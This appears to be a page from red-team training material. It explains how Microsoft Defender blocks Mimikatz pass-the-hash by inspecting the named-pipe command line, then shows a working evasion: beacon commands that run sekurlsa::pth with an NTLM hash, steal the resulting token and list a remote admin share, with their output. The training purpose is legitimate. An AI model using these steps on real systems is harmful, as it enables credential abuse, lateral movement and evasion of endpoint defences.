Command Line Detections | What is this changing

Last updated 9 hours ago

Defender also has the ability to inspect the command line arguments of a process and can prevent it from starting if it has malicious content. A common place you may find this is with the built-in pth command.

We can see from the console log that this expands to:

However, you will get an access denied error when Mimikatz tries to call CreateProcessWithLogonW.

It's not entirely obvious on the surface that this is caused by Defender, but you can see the alert in both in the GUI and via Get-MpThreatDetection. The "CmdLine" prefix gives away the origin of the detection. In this case, it's the echo x > \\.\pipe\ pattern as this is synonymous with named pipe impersonation (also obvious from the title of the alert).

ActionSuccess                  : True
AdditionalActionsBitMask       : 0
AMProductVersion               : 4.18.2205.7
CleaningActionID               : 3
CurrentThreatExecutionStatusID : 0
DetectionID                    : {2773A98F-C5FE-4BA2-B6F1-96C2F4D296D4}
DetectionSourceTypeID          : 2
DomainUser                     : NT AUTHORITY\SYSTEM
InitialDetectionTime           : 10/30/2023 2:25:56 PM
LastThreatStatusChangeTime     : 10/30/2023 2:26:42 PM
ProcessName                    : Unknown
RemediationTime                : 10/30/2023 2:26:42 PM
Resources                      : {CmdLine:_C:\Windows\System32\cmd.exe /c echo 9c91bb58485 > \\.\pipe\34a65a}
ThreatID                       : 2147735445
ThreatStatusErrorCode          : 0
ThreatStatusID                 : 4
PSComputerName                 :

The reason this returns an access denied (i.e. error code 5) is because the enforcement is coming from the Windows Defender driver in the kernel. This driver receives when new processes are being created, which contain a structure. The eagle-eyed will spot the CreationStatus member, which is the NTSTATUS value to return. The driver can simply set this to STATUS_ACCESS_DENIED to prevent the process from starting, and that error code propagates down to the caller.

Bypassing or disabling kernel-level callbacks is out of scope for RTO. The easiest workaround is to find a way to achieve the same goal but in a way that doesn't involve the same command line arguments. For pass-the-hash, we can simply start an arbitrary process and steal its token manually.

beacon> mimikatz sekurlsa::pth /user:"jking" /domain:"DEV" /ntlm:59fc0f884922b4ce376051134c71e22c /run:notepad.exe

user	: jking
domain	: DEV
program	: notepad.exe
impers.	: no
NTLM	: 59fc0f884922b4ce376051134c71e22c
  |  PID  17896
  |  TID  11384
  |  LSA Process is now R/W
  |  LUID 0 ; 8586493 (00000000:008304fd)
  \_ msv1_0   - data copy @ 00000129694D4070 : OK !
  \_ kerberos - data copy @ 00000129694CCD28

beacon> steal_token 17896
[+] Impersonated DEV\bfarmer

beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 18:50:13   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 18:58:09   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     09/26/2023 08:38:47   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     10/30/2023 13:58:46   ProgramData
          dir     08/15/2022 18:31:08   Recovery
          dir     11/02/2022 09:32:00   System Volume Information
          dir     08/30/2022 17:51:08   Users
          dir     09/26/2023 08:51:14   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     10/30/2023 13:27:39   DumpStack.log.tmp
 384mb    fil     10/30/2023 13:27:39   pagefile.sys

user	: jking
domain	: DEV
program	: C:\Windows\system32\cmd.exe /c echo 9c91bb58485 > \\.\pipe\34a65a
impers.	: no
NTLM	: 59fc0f884922b4ce376051134c71e22c
ERROR kuhl_m_sekurlsa_pth ; CreateProcessWithLogonW (0x00000005)